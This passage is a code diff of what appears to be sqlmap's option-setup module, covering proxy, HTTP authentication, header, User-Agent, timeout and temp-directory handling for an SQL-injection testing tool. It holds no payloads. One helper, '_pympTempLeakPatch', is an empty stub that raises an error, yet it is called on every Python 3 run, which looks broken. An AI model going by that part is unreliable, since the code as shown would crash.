version of socket.create_connection """ - global proxyHandler + if conf.disablePrecon: + return - if not conf.proxy: - if conf.hostname in ('localhost', '127.0.0.1') or conf.ignoreProxy: - proxyHandler = urllib2.ProxyHandler({}) + def _thread(): + while kb.get("threadContinue") and not conf.get("disablePrecon"): + try: + with kb.locks.socket: + keys = list(socket._ready.keys()) + + for key in keys: + with kb.locks.socket: + q = socket._ready.get(key) + if q is None or len(q) >= SOCKET_PRE_CONNECT_QUEUE_SIZE: + continue + args = key[0] + kwargs = dict(key[1]) + + s = socket._create_connection(*args, **kwargs) + + with kb.locks.socket: + q = socket._ready.get(key) + if q is not None and len(q) < SOCKET_PRE_CONNECT_QUEUE_SIZE: + q.append((s, time.time())) + s = None + + if s is not None: + try: + s.close() + except: + pass + + except KeyboardInterrupt: + break + except: + pass + finally: + time.sleep(0.01) + + def create_connection(*args, **kwargs): + retVal = None + stale = [] + + key = (tuple(args), frozenset(kwargs.items())) + with kb.locks.socket: + if key not in socket._ready: + socket._ready[key] = collections.deque() + + q = socket._ready[key] + while len(q) > 0: + candidate, created = q.popleft() + if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT: + retVal = candidate + break + else: + stale.append(candidate) - return + for candidate in stale: + try: + candidate.shutdown(socket.SHUT_RDWR) + candidate.close() + except: + pass - debugMsg = "setting the HTTP/SOCKS proxy to pass by all HTTP requests" - logger.debug(debugMsg) + if not retVal: + retVal = socket._create_connection(*args, **kwargs) + else: + try: + retVal.settimeout(kwargs.get("timeout", socket.getdefaulttimeout())) + except: + pass - proxySplit = urlparse.urlsplit(conf.proxy) - hostnamePort = proxySplit.netloc.split(":") + return retVal - scheme = proxySplit.scheme.upper() - hostname = hostnamePort[0] - port = None - username = None - password = None + if not hasattr(socket, "_create_connection"): + socket._ready = {} + socket._create_connection = socket.create_connection + socket.create_connection = create_connection - if len(hostnamePort) == 2: - try: - port = int(hostnamePort[1]) - except: - pass # drops into the next check block + thread = threading.Thread(target=_thread) + setDaemon(thread) + thread.start() - if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)): - errMsg = "proxy value must be in format '(%s)://url:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE)) - raise SqlmapSyntaxException(errMsg) +def _setHTTPHandlers(): + """ + Check and set the HTTP/SOCKS proxy for all HTTP requests. + """ - if conf.pCred: - _ = re.search("^(.*?):(.*?)$", conf.pCred) - if not _: - errMsg = "Proxy authentication credentials " - errMsg += "value must be in format username:password" - raise SqlmapSyntaxException(errMsg) - else: - username = _.group(1) - password = _.group(2) + with kb.locks.handlers: + if conf.proxyList: + conf.proxy = conf.proxyList[0] + conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1] - if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5): - socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password) - socks.wrapmodule(urllib2) - else: - if conf.pCred: - # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection - proxyString = "%s@" % conf.pCred - else: - proxyString = "" + if len(conf.proxyList) > 1: + infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy + logger.info(infoMsg) + + elif not conf.proxy: + if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy: + proxyHandler.proxies = {} - proxyString += "%s:%d" % (hostname, port) - proxyHandler = urllib2.ProxyHandler({"http": proxyString, "https": proxyString}) + if conf.proxy: + debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests" + logger.debug(debugMsg) + + try: + _ = _urllib.parse.urlsplit(conf.proxy) + except Exception as ex: + errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) -def _setSafeUrl(): + match = re.search(r"\A([^:]*):([^:]*)@([^@]+)\Z", _.netloc) + if match: + username, password = match.group(1), match.group(2) + else: + username, password = None, None + + hostnamePort = _.netloc.rsplit('@', 1)[-1].rsplit(":", 1) + + scheme = _.scheme.upper() + hostname = hostnamePort[0] + port = None + + if len(hostnamePort) == 2: + try: + port = int(hostnamePort[1]) + except: + pass # drops into the next check block + + if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)): + errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE)) + raise SqlmapSyntaxException(errMsg) + + if conf.proxyCred: + _ = re.search(r"\A(.*?):(.*?)\Z", conf.proxyCred) + if not _: + errMsg = "proxy authentication credentials " + errMsg += "value must be in format username:password" + raise SqlmapSyntaxException(errMsg) + else: + username = _.group(1) + password = _.group(2) + + if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5): + proxyHandler.proxies = {} + + if scheme == PROXY_TYPE.SOCKS4: + warnMsg = "SOCKS4 does not support resolving (DNS) names (i.e. causing DNS leakage)" + singleTimeWarnMessage(warnMsg) + + socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password) + socks.wrapmodule(_http_client) + else: + socks.unwrapmodule(_http_client) + + if conf.proxyCred: + # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection + proxyString = "%s@" % conf.proxyCred + else: + proxyString = "" + + proxyString += "%s:%d" % (hostname, port) + proxyHandler.proxies = kb.proxies = {"http": proxyString, "https": proxyString} + + proxyHandler.__init__(proxyHandler.proxies) + + if not proxyHandler.proxies: + for _ in ("http", "https"): + if hasattr(proxyHandler, "%s_open" % _): + delattr(proxyHandler, "%s_open" % _) + + debugMsg = "creating HTTP requests opener object" + logger.debug(debugMsg) + + handlers = filterNone([multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, chunkedHandler if conf.chunked else None, httpsHandler]) + + if not conf.dropSetCookie: + if not conf.loadCookies: + conf.cj = _http_cookiejar.CookieJar() + else: + conf.cj = _http_cookiejar.MozillaCookieJar() + resetCookieJar(conf.cj) + + handlers.append(_urllib.request.HTTPCookieProcessor(conf.cj)) + + # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html + if conf.keepAlive: + warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " + warnMsg += "been disabled because of its incompatibility " + + if conf.proxy: + warnMsg += "with HTTP(s) proxy" + logger.warning(warnMsg) + elif conf.authType: + warnMsg += "with authentication methods" + logger.warning(warnMsg) + else: + handlers.append(keepAliveHandler) + + opener = _urllib.request.build_opener(*handlers) + opener.addheaders = [] # Note: clearing default "User-Agent: Python-urllib/X.Y" + _urllib.request.install_opener(opener) + +def _setSafeVisit(): """ - Check and set the safe URL options. + Check and set the safe visit options. """ - if not conf.safUrl: + if not any((conf.safeUrl, conf.safeReqFile)): return - if not re.search("^http[s]*://", conf.safUrl): - if ":443/" in conf.safUrl: - conf.safUrl = "https://" + conf.safUrl + if conf.safeReqFile: + checkFile(conf.safeReqFile) + + raw = readCachedFileContent(conf.safeReqFile) + match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw.split('\n')[0].strip()) + + if match: + kb.safeReq.method = match.group(1) + kb.safeReq.url = match.group(2) + kb.safeReq.headers = {} + + for line in raw.split('\n')[1:]: + line = line.strip() + if line and ':' in line: + key, value = line.split(':', 1) + value = value.strip() + kb.safeReq.headers[key] = value + if key.upper() == HTTP_HEADER.HOST.upper(): + if not value.startswith("http"): + scheme = "http" + if value.endswith(":443"): + scheme = "https" + value = "%s://%s" % (scheme, value) + kb.safeReq.url = _urllib.parse.urljoin(value, kb.safeReq.url) + else: + break + + post = None + + if '\r\n\r\n' in raw: + post = raw[raw.find('\r\n\r\n') + 4:] + elif '\n\n' in raw: + post = raw[raw.find('\n\n') + 2:] + + if post and post.strip(): + kb.safeReq.post = post + else: + kb.safeReq.post = None else: - conf.safUrl = "http://" + conf.safUrl + errMsg = "invalid format of a safe request file" + raise SqlmapSyntaxException(errMsg) + else: + if not re.search(r"(?i)\Ahttp[s]*://", conf.safeUrl): + if ":443/" in conf.safeUrl: + conf.safeUrl = "https://%s" % conf.safeUrl + else: + conf.safeUrl = "http://%s" % conf.safeUrl - if conf.saFreq <= 0: - errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe url feature" + if (conf.safeFreq or 0) <= 0: + errMsg = "please provide a valid value (>0) for safe frequency ('--safe-freq') while using safe visit features" raise SqlmapSyntaxException(errMsg) def _setPrefixSuffix(): @@ -1024,51 +1347,62 @@ def _setAuthCred(): (used by connection handler) """ - if kb.passwordMgr: - kb.passwordMgr.add_password(None, "%s://%s" % (conf.scheme, conf.hostname), conf.authUsername, conf.authPassword) + if kb.passwordMgr and all(_ is not None for _ in (conf.scheme, conf.hostname, conf.port, conf.authUsername, conf.authPassword)): + kb.passwordMgr.add_password(None, "%s://%s:%d" % (conf.scheme, conf.hostname, conf.port), conf.authUsername, conf.authPassword) def _setHTTPAuthentication(): """ - Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or Certificate), - username and password for first three methods, or key file and certification file for - certificate authentication + Check and set the HTTP(s) authentication method (Basic, Digest, Bearer, NTLM or PKI), + username and password for first three methods, or PEM private key file for + PKI authentication """ global authHandler - if not conf.aType and not conf.aCred and not conf.aCert: + if not conf.authType and not conf.authCred and not conf.authFile: return - elif conf.aType and not conf.aCred: + if conf.authFile and not conf.authType: + conf.authType = AUTH_TYPE.PKI + + elif conf.authType and not conf.authCred and not conf.authFile: errMsg = "you specified the HTTP authentication type, but " errMsg += "did not provide the credentials" raise SqlmapSyntaxException(errMsg) - elif not conf.aType and conf.aCred: + elif not conf.authType and conf.authCred: errMsg = "you specified the HTTP authentication credentials, " - errMsg += "but did not provide the type" + errMsg += "but did not provide the type (e.g. --auth-type=\"basic\")" raise SqlmapSyntaxException(errMsg) - if not conf.aCert: + elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.BEARER, AUTH_TYPE.NTLM, AUTH_TYPE.PKI): + errMsg = "HTTP authentication type value must be " + errMsg += "Basic, Digest, Bearer, NTLM or PKI" + raise SqlmapSyntaxException(errMsg) + + if not conf.authFile: debugMsg = "setting the HTTP authentication type and credentials" logger.debug(debugMsg) - aTypeLower = conf.aType.lower() + authType = conf.authType.lower() - if aTypeLower not in ("basic", "digest", "ntlm"): - errMsg = "HTTP authentication type value must be " - errMsg += "Basic, Digest or NTLM" - raise SqlmapSyntaxException(errMsg) - elif aTypeLower in ("basic", "digest"): + if authType in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST): regExp = "^(.*?):(.*?)$" - errMsg = "HTTP %s authentication credentials " % aTypeLower - errMsg += "value must be in format username:password" - elif aTypeLower == "ntlm": + errMsg = "HTTP %s authentication credentials " % authType + errMsg += "value must be in format 'username:password'" + elif authType == AUTH_TYPE.BEARER: + conf.httpHeaders.append((HTTP_HEADER.AUTHORIZATION, "Bearer %s" % conf.authCred.strip())) + return + elif authType == AUTH_TYPE.NTLM: regExp = "^(.*\\\\.*):(.*?)$" errMsg = "HTTP NTLM authentication credentials value must " - errMsg += "be in format DOMAIN\username:password" + errMsg += "be in format 'DOMAIN\\username:password'" + elif authType == AUTH_TYPE.PKI: + errMsg = "HTTP PKI authentication require " + errMsg += "usage of option `--auth-file`" + raise SqlmapSyntaxException(errMsg) - aCredRegExp = re.search(regExp, conf.aCred) + aCredRegExp = re.search(regExp, conf.authCred) if not aCredRegExp: raise SqlmapSyntaxException(errMsg) @@ -1076,101 +1410,67 @@ def _setHTTPAuthentication(): conf.authUsername = aCredRegExp.group(1) conf.authPassword = aCredRegExp.group(2) - kb.passwordMgr = urllib2.HTTPPasswordMgrWithDefaultRealm() + kb.passwordMgr = _urllib.request.HTTPPasswordMgrWithDefaultRealm() _setAuthCred() - if aTypeLower == "basic": + if authType == AUTH_TYPE.BASIC: authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr) - elif aTypeLower == "digest": - authHandler = urllib2.HTTPDigestAuthHandler(kb.passwordMgr) + elif authType == AUTH_TYPE.DIGEST: + authHandler = _urllib.request.HTTPDigestAuthHandler(kb.passwordMgr) - elif aTypeLower == "ntlm": + elif authType == AUTH_TYPE.NTLM: try: from ntlm import HTTPNtlmAuthHandler except ImportError: errMsg = "sqlmap requires Python NTLM third-party library " - errMsg += "in order to authenticate via NTLM, " - errMsg += "http://code.google.com/p/python-ntlm/" + errMsg += "in order to authenticate via NTLM. Download from " + errMsg += "'https://github.com/mullender/python-ntlm'" raise SqlmapMissingDependence(errMsg) authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(kb.passwordMgr) else: - debugMsg = "setting the HTTP(s) authentication certificate" + debugMsg = "setting the HTTP(s) authentication PEM private key" logger.debug(debugMsg) - aCertRegExp = re.search("^(.+?),\s*(.+?)$", conf.aCert) - - if not aCertRegExp: - errMsg = "HTTP authentication certificate option " - errMsg += "must be in format key_file,cert_file" - raise SqlmapSyntaxException(errMsg) - - # os.path.expanduser for support of paths with ~ - key_file = os.path.expanduser(aCertRegExp.group(1)) - cert_file = os.path.expanduser(aCertRegExp.group(2)) - - for ifile in (key_file, cert_file): - if not os.path.exists(ifile): - errMsg = "File '%s' does not exist" % ifile - raise SqlmapSyntaxException(errMsg) - - authHandler = HTTPSCertAuthHandler(key_file, cert_file) - -def _setHTTPMethod(): - """ - Check and set the HTTP method to perform HTTP requests through. - """ - - conf.method = HTTPMETHOD.POST if conf.data is not None else HTTPMETHOD.GET - - debugMsg = "setting the HTTP method to %s" % conf.method - logger.debug(debugMsg) + _ = safeExpandUser(conf.authFile) + checkFile(_) + authHandler = HTTPSPKIAuthHandler(_) def _setHTTPExtraHeaders(): if conf.headers: debugMsg = "setting extra HTTP headers" logger.debug(debugMsg) - conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n") + if "\\n" in conf.headers: + conf.headers = conf.headers.replace("\\r\\n", "\\n").split("\\n") + else: + conf.headers = conf.headers.replace("\r\n", "\n").split("\n") for headerValue in conf.headers: - if headerValue.count(':') == 1: - header, value = (_.lstrip() for _ in headerValue.split(":")) + if not headerValue.strip(): + continue + + if headerValue.count(':') >= 1: + header, value = (_.lstrip() for _ in headerValue.split(":", 1)) if header and value: conf.httpHeaders.append((header, value)) + elif headerValue.startswith('@'): + checkFile(headerValue[1:]) + kb.headersFile = headerValue[1:] else: errMsg = "invalid header value: %s. Valid header format is 'name:value'" % repr(headerValue).lstrip('u') raise SqlmapSyntaxException(errMsg) - elif not conf.httpHeaders or len(conf.httpHeaders) == 1: - conf.httpHeaders.append((HTTPHEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5")) - if not conf.charset: - conf.httpHeaders.append((HTTPHEADER.ACCEPT_CHARSET, "ISO-8859-15,utf-8;q=0.7,*;q=0.7")) - else: - conf.httpHeaders.append((HTTPHEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset)) + elif not conf.requestFile and len(conf.httpHeaders or []) < 2: + if conf.encoding: + conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.encoding)) # Invalidating any caching mechanism in between - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html - conf.httpHeaders.append((HTTPHEADER.CACHE_CONTROL, "no-cache,no-store")) - conf.httpHeaders.append((HTTPHEADER.PRAGMA, "no-cache")) - -def _defaultHTTPUserAgent(): - """ - @return: default sqlmap HTTP User-Agent header - @rtype: C{str} - """ - - return "%s (%s)" % (VERSION_STRING, SITE) - - # Firefox 3 running on Ubuntu 9.04 updated at April 2009 - #return "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9" - - # Internet Explorer 7.0 running on Windows 2003 Service Pack 2 english - # updated at March 2009 - #return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" + # Reference: http://stackoverflow.com/a/1383359 + conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache")) def _setHTTPUserAgent(): """ @@ -1183,71 +1483,54 @@ def _setHTTPUserAgent(): file choosed as user option """ + debugMsg = "setting the HTTP User-Agent header" + logger.debug(debugMsg) + if conf.mobile: - message = "which smartphone do you want sqlmap to imitate " - message += "through HTTP User-Agent header?\n" - items = sorted(getPublicTypeMembers(MOBILES, True)) + if conf.randomAgent: + _ = random.sample([_[1] for _ in getPublicTypeMembers(MOBILES, True)], 1)[0] + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, _)) + else: + message = "which smartphone do you want sqlmap to imitate " + message += "through HTTP User-Agent header?\n" + items = sorted(getPublicTypeMembers(MOBILES, True)) - for count in xrange(len(items)): - item = items[count] - message += "[%d] %s%s\n" % (count + 1, item[0], " (default)" if item == MOBILES.IPHONE else "") + for count in xrange(len(items)): + item = items[count] + message += "[%d] %s%s\n" % (count + 1, item[0], " (default)" if item == MOBILES.IPHONE else "") - test = readInput(message.rstrip('\n'), default=items.index(MOBILES.IPHONE) + 1) + test = readInput(message.rstrip('\n'), default=items.index(MOBILES.IPHONE) + 1) - try: - item = items[int(test) - 1] - except: - item = MOBILES.IPHONE + try: + item = items[int(test) - 1] + except: + item = MOBILES.IPHONE - conf.httpHeaders.append((HTTPHEADER.USER_AGENT, item[1])) + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, item[1])) elif conf.agent: - debugMsg = "setting the HTTP User-Agent header" - logger.debug(debugMsg) - - conf.httpHeaders.append((HTTPHEADER.USER_AGENT, conf.agent)) + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, conf.agent)) elif not conf.randomAgent: _ = True for header, _ in conf.httpHeaders: - if header == HTTPHEADER.USER_AGENT: + if header.upper() == HTTP_HEADER.USER_AGENT.upper(): _ = False break if _: - conf.httpHeaders.append((HTTPHEADER.USER_AGENT, _defaultHTTPUserAgent())) + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, DEFAULT_USER_AGENT)) else: - if not kb.userAgents: - debugMsg = "loading random HTTP User-Agent header(s) from " - debugMsg += "file '%s'" % paths.USER_AGENTS - logger.debug(debugMsg) - - try: - kb.userAgents = getFileItems(paths.USER_AGENTS) - except IOError: - warnMsg = "unable to read HTTP User-Agent header " - warnMsg += "file '%s'" % paths.USER_AGENTS - logger.warn(warnMsg) - - conf.httpHeaders.append((HTTPHEADER.USER_AGENT, _defaultHTTPUserAgent())) - return - - count = len(kb.userAgents) + userAgent = fetchRandomAgent() - if count == 1: - userAgent = kb.userAgents[0] - else: - userAgent = kb.userAgents[randomRange(stop=count - 1)] - - userAgent = sanitizeStr(userAgent) - conf.httpHeaders.append((HTTPHEADER.USER_AGENT, userAgent)) - - infoMsg = "fetched random HTTP User-Agent header from " - infoMsg += "file '%s': %s" % (paths.USER_AGENTS, userAgent) + infoMsg = "fetched random HTTP User-Agent header value '%s' from " % userAgent + infoMsg += "file '%s'" % paths.USER_AGENTS logger.info(infoMsg) + conf.httpHeaders.append((HTTP_HEADER.USER_AGENT, userAgent)) + def _setHTTPReferer(): """ Set the HTTP Referer @@ -1257,7 +1540,18 @@ def _setHTTPReferer(): debugMsg = "setting the HTTP Referer header" logger.debug(debugMsg) - conf.httpHeaders.append((HTTPHEADER.REFERER, conf.referer)) + conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer)) + +def _setHTTPHost(): + """ + Set the HTTP Host + """ + + if conf.host: + debugMsg = "setting the HTTP Host header" + logger.debug(debugMsg) + + conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host)) def _setHTTPCookies(): """ @@ -1268,43 +1562,155 @@ def _setHTTPCookies(): debugMsg = "setting the HTTP Cookie header" logger.debug(debugMsg) - conf.httpHeaders.append((HTTPHEADER.COOKIE, conf.cookie)) + conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie)) + +def _setHostname(): + """ + Set value conf.hostname + """ + + if conf.url: + try: + conf.hostname = _urllib.parse.urlsplit(conf.url).netloc.split(':')[0] + except ValueError as ex: + errMsg = "problem occurred while " + errMsg += "parsing an URL '%s' ('%s')" % (conf.url, getSafeExString(ex)) + raise SqlmapDataException(errMsg) def _setHTTPTimeout(): """ Set the HTTP timeout """ - if conf.timeout: - debugMsg = "setting the HTTP timeout" - logger.debug(debugMsg) + if conf.timeout: + debugMsg = "setting the HTTP timeout" + logger.debug(debugMsg) + + conf.timeout = float(conf.timeout) + + if conf.timeout < 3.0: + warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap " + warnMsg += "will going to reset it" + logger.warning(warnMsg) + + conf.timeout = 3.0 + else: + conf.timeout = 30.0 + + try: + socket.setdefaulttimeout(conf.timeout) + except OverflowError as ex: + raise SqlmapValueException("invalid value used for option '--timeout' ('%s')" % getSafeExString(ex)) + +def _checkDependencies(): + """ + Checks for missing dependencies. + """ + + if conf.dependencies: + checkDependencies() + +def _createHomeDirectories(): + """ + Creates directories inside sqlmap's home directory + """ + + if conf.get("purge"): + return + + for context in ("output", "history"): + directory = paths["SQLMAP_%s_PATH" % getUnicode(context).upper()] # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4363 + try: + if not os.path.isdir(directory): + os.makedirs(directory) + + _ = os.path.join(directory, randomStr()) + open(_, "w+").close() + os.remove(_) + + if conf.get("outputDir") and context == "output": + warnMsg = "using '%s' as the %s directory" % (directory, context) + logger.warning(warnMsg) + except (OSError, IOError) as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmap%s" % context) + warnMsg = "unable to %s %s directory " % ("create" if not os.path.isdir(directory) else "write to the", context) + warnMsg += "'%s' (%s). " % (directory, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warning(warnMsg) + + paths["SQLMAP_%s_PATH" % context.upper()] = tempDir + +def _pympTempLeakPatch(tempDir): # Cross-referenced function + raise NotImplementedError + +def _createTemporaryDirectory(): + """ + Creates temporary directory for this run. + """ + + if conf.tmpDir: + try: + if not os.path.isdir(conf.tmpDir): + os.makedirs(conf.tmpDir) + + _ = os.path.join(conf.tmpDir, randomStr()) - conf.timeout = float(conf.timeout) + open(_, "w+").close() + os.remove(_) - if conf.timeout < 3.0: - warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap " - warnMsg += "will going to reset it" - logger.warn(warnMsg) + tempfile.tempdir = conf.tmpDir - conf.timeout = 3.0 + warnMsg = "using '%s' as the temporary directory" % conf.tmpDir + logger.warning(warnMsg) + except (OSError, IOError) as ex: + errMsg = "there has been a problem while accessing " + errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex) + raise SqlmapSystemException(errMsg) else: - conf.timeout = 30.0 + try: + if not os.path.isdir(tempfile.gettempdir()): + os.makedirs(tempfile.gettempdir()) + except Exception as ex: + warnMsg = "there has been a problem while accessing " + warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex) + warnMsg += "make sure that there is enough disk space left. If problem persists, " + warnMsg += "try to set environment variable 'TEMP' to a location " + warnMsg += "writeable by the current user" + logger.warning(warnMsg) + + if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir: + try: + tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid())) + except: + tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid())) - socket.setdefaulttimeout(conf.timeout) + kb.tempDir = tempfile.tempdir -def _checkDependencies(): - """ - Checks for missing dependencies. - """ + if not os.path.isdir(tempfile.tempdir): + try: + os.makedirs(tempfile.tempdir) + except Exception as ex: + errMsg = "there has been a problem while setting " + errMsg += "temporary directory location ('%s')" % getSafeExString(ex) + raise SqlmapSystemException(errMsg) - if conf.dependencies: - checkDependencies() + conf.tempDirs.append(tempfile.tempdir) + + if six.PY3: + _pympTempLeakPatch(kb.tempDir) def _cleanupOptions(): """ Cleanup configuration attributes. """ + if conf.encoding: + try: + codecs.lookup(conf.encoding) + except LookupError: + errMsg = "unknown encoding '%s'" % conf.encoding + raise SqlmapValueException(errMsg) + debugMsg = "cleaning up configuration parameters" logger.debug(debugMsg) @@ -1315,39 +1721,101 @@ def _cleanupOptions(): else: conf.progressWidth = width - 46 + for key, value in conf.items(): + if value and any(key.endswith(_) for _ in ("Path", "File", "Dir")): + if isinstance(value, str): + conf[key] = safeExpandUser(value) + if conf.testParameter: conf.testParameter = urldecode(conf.testParameter) - conf.testParameter = conf.testParameter.replace(" ", "") - conf.testParameter = re.split(PARAMETER_SPLITTING_REGEX, conf.testParameter) + conf.testParameter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.testParameter)] else: conf.testParameter = [] + if conf.ignoreCode: + if conf.ignoreCode == IGNORE_CODE_WILDCARD: + conf.ignoreCode = xrange(0, 1000) + else: + try: + conf.ignoreCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.ignoreCode)] + except ValueError: + errMsg = "option '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD + raise SqlmapSyntaxException(errMsg) + else: + conf.ignoreCode = [] + + if conf.abortCode: + try: + conf.abortCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.abortCode)] + except ValueError: + errMsg = "option '--abort-code' should contain a list of integer values" + raise SqlmapSyntaxException(errMsg) + else: + conf.abortCode = [] + + if conf.paramFilter: + conf.paramFilter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.paramFilter.upper())] + else: + conf.paramFilter = [] + + if conf.base64Parameter: + conf.base64Parameter = urldecode(conf.base64Parameter) + conf.base64Parameter = conf.base64Parameter.strip() + conf.base64Parameter = re.split(PARAMETER_SPLITTING_REGEX, conf.base64Parameter) + else: + conf.base64Parameter = [] + + if conf.agent: + conf.agent = re.sub(r"[\r\n]", "", conf.agent) + if conf.user: conf.user = conf.user.replace(" ", "") if conf.rParam: - conf.rParam = conf.rParam.replace(" ", "") - conf.rParam = re.split(PARAMETER_SPLITTING_REGEX, conf.rParam) + if all(_ in conf.rParam for _ in ('=', ',')): + original = conf.rParam + conf.rParam = [] + for part in original.split(';'): + if '=' in part: + left, right = part.split('=', 1) + conf.rParam.append(left) + kb.randomPool[left] = filterNone(_.strip() for _ in right.split(',')) + else: + conf.rParam.append(part) + else: + conf.rParam = conf.rParam.replace(" ", "") + conf.rParam = re.split(PARAMETER_SPLITTING_REGEX, conf.rParam) else: conf.rParam = [] + if conf.paramDel: + conf.paramDel = decodeStringEscape(conf.paramDel) + if conf.skip: conf.skip = conf.skip.replace(" ", "") conf.skip = re.split(PARAMETER_SPLITTING_REGEX, conf.skip) else: conf.skip = [] + if conf.cookie: + conf.cookie = re.sub(r"[\r\n]", "", conf.cookie) + if conf.delay: conf.delay = float(conf.delay) - if conf.rFile: - conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile)) + if conf.url: + conf.url = conf.url.strip().lstrip('/') + if not re.search(r"\A\w+://", conf.url): + conf.url = "http://%s" % conf.url + + if conf.fileRead: + conf.fileRead = ntToPosixSlashes(normalizePath(conf.fileRead)) - if conf.wFile: - conf.wFile = ntToPosixSlashes(normalizePath(conf.wFile)) + if conf.fileWrite: + conf.fileWrite = ntToPosixSlashes(normalizePath(conf.fileWrite)) - if conf.dFile: - conf.dFile = ntToPosixSlashes(normalizePath(conf.dFile)) + if conf.fileDest: + conf.fileDest = ntToPosixSlashes(normalizePath(conf.fileDest)) if conf.msfPath: conf.msfPath = ntToPosixSlashes(normalizePath(conf.msfPath)) @@ -1355,29 +1823,66 @@ def _cleanupOptions(): if conf.tmpPath: conf.tmpPath = ntToPosixSlashes(normalizePath(conf.tmpPath)) - if conf.googleDork or conf.logFile or conf.bulkFile or conf.forms or conf.crawlDepth: + if any((conf.googleDork, conf.logFile, conf.bulkFile, conf.forms, conf.crawlDepth, conf.stdinPipe)): conf.multipleTargets = True if conf.optimize: setOptimize() - if conf.data: - conf.data = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data, re.I) - - if conf.url: - conf.url = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url, re.I) - if conf.os: conf.os = conf.os.capitalize() + if conf.forceDbms: + conf.dbms = conf.forceDbms + if conf.dbms: - conf.dbms = conf.dbms.capitalize() + kb.dbmsFilter = [] + for _ in conf.dbms.split(','): + for dbms, aliases in DBMS_ALIASES: + if _.strip().lower() in aliases: + kb.dbmsFilter.append(dbms) + conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None + break + + if conf.uValues: + conf.uCols = "%d-%d" % (1 + conf.uValues.count(','), 1 + conf.uValues.count(',')) if conf.testFilter: - if not any([char in conf.testFilter for char in ('.', ')', '(', ']', '[')]): - conf.testFilter = conf.testFilter.replace('*', '.*') + conf.testFilter = conf.testFilter.strip('*+') + conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter) + + try: + re.compile(conf.testFilter) + except re.error: + conf.testFilter = re.escape(conf.testFilter) + + if conf.csrfToken: + original = conf.csrfToken + try: + re.compile(conf.csrfToken) + + if re.escape(conf.csrfToken) != 